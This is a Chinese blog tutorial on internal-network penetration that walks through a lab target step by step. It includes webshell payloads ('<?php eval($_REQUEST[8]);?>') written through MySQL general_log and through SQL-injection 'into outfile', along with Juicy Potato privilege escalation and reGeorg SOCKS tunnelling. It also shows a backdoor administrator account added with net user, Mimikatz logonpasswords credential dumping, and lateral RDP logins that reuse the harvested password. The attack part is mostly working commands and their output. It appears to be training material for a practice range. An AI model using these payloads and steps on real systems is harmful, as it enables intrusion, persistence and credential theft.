渗透测试之内网渗透(一)

预备知识

什么是内网渗透?

在我们拿下目标服务器后,对其局域网进行攻击,比如提权、权限维持、数据提取

如何绕过1290安全性报错?

mysql日志法(root权限)

1.show variables like ‘%general%’; #查看配置
2.set global general_log = on; #开启general log模式
3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell地址
4.select ‘<?php eval($_REQUEST[8]);?>’ #写入shell

烂土豆的功能

能够自动拿取系统的最高权限,并且对windows全版本通杀,如果系统版本不兼容就可以指定系统 烂土豆.exe -p “whoami” -c{}

Regeorg功能

考虑一种场景,有两个主机A和B。其中主机A上运行了Web服务,且端口映射到公网,可以被网布人员访问,主机B是在网访问不到的。攻击者通过楼哦东在主机A上传了webshell,但同时又处于某些限制不能得到A的主机权限,这个时候也无法通过常规方法直接登录到主机B获取权限。
这个时候reGeorg在这个时候又了很大的作用,攻击者已经有了主机A的webshell权限,而主机A能够同主机B通信,那么在主机A上安装reGeorg工具,使得攻击者发出的请求能够通过A转达到B,而B的响应能够转达到攻击者。

图片

连接语法:
py -2 reGeorgSocksProxy.py -u 文件地址 -l 127.0.0.1 -p 端口

猕猴桃的作用

猕猴桃提权,并将密码通过纯明文的形式显示出来

碰撞的语法

privilege::debug 提神权限
log
sekurlsa::logopasswords 抓取密码

proxifier的作用

能够添加代理服务器,设置代理规则,只对某个进程进行代理,可以防止网络被影响。

靶场实战

一、判断是否存在sql注入
输入:id=1 and 1=2
结果:

图片

二、判断字段数
输入:id=1 order by 3
结果:字段数为2

图片

三、判断显错位
输入:id=1 and 1=2 union select 1,2
结果:显错位在第二位

图片

四、写入一句话木马
输入:id=1 and 1=2 union select 1,’<?php eval($_REQUEST[8])?>’ into outfile ‘C:\phpStudy\WWW\1.php’(文件路径从网页报错获取)
结果:写入木马文件1.php

图片

五、菜刀连接并查看自己的权限
输入:whoami
结果:为test

图片

六、查看系统信息
输入:systeminfo
结果:获取了系统版本为Windows Server 2008 R2,并且是在虚拟机上运行的,且ip为10.0.1.4,并且有两个补丁

图片

七、使用烂土豆提权
前提:将烂土豆文件拖入到菜刀中,并改名为123.exe
输入:123.exe -p “whoami”
结果:提权成功

图片

八、查看3389端口是否开启
输入:netstat -ano
结果:开启

图片

九、将文件tunnel.nosocket.php拖入菜刀,并修改为It.php

图片

十、运行reGeorgSocksProxy.py 连接本机和目标主机
前提:安装了 urllib3(python -m pip install urllib3)
输入:py -2 reGeorgSocksProxy.py -u http://afsgr16-b1ferw.aqlab.cn/It.php -l 127.0.0.1 -p 10010
结果:开启本地端口10010,进行连接
(我使用的是pycharm中的终端)

图片

十一、使用proxifier代理

图片


(记得将default的动作改为direct,只添加mstsc.exe,其它的都删除)

图片

十二、创建新的管理用户以便有凭据进行远程连接
输入:123.exe -p “net user yy yy123321!/add”(这里对密码有要求,复杂一点点就好了)
输入:123.exe -p “net localgroup administrators yy/add”
结果:我的账号yy 密码 yy123321! 成功变为目标主机的管理员

图片

十三、将猕猴桃拖入菜刀

图片

十四、远程连接目标主机

图片

十五、使用猕猴桃碰撞密码
前提:使用管理员身份进行碰撞
输入:
1、privilege::debug
2、log
3、sekurlsa::logonpasswords
结果:获取密码为 woshifengge1.(别忘记有个点了)

图片

十六、查看主机网段信息

图片

十七、我们不断尝试远程连接10.0.1.0的所有内网ip
凭据:用户:Administrator 密码:woshifengge1.
结果:在10.0.1.8连接成功(这边建议不要想我一样,可以尝试s扫描器)获取flag

图片

图片

没看够~?欢迎关注!

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值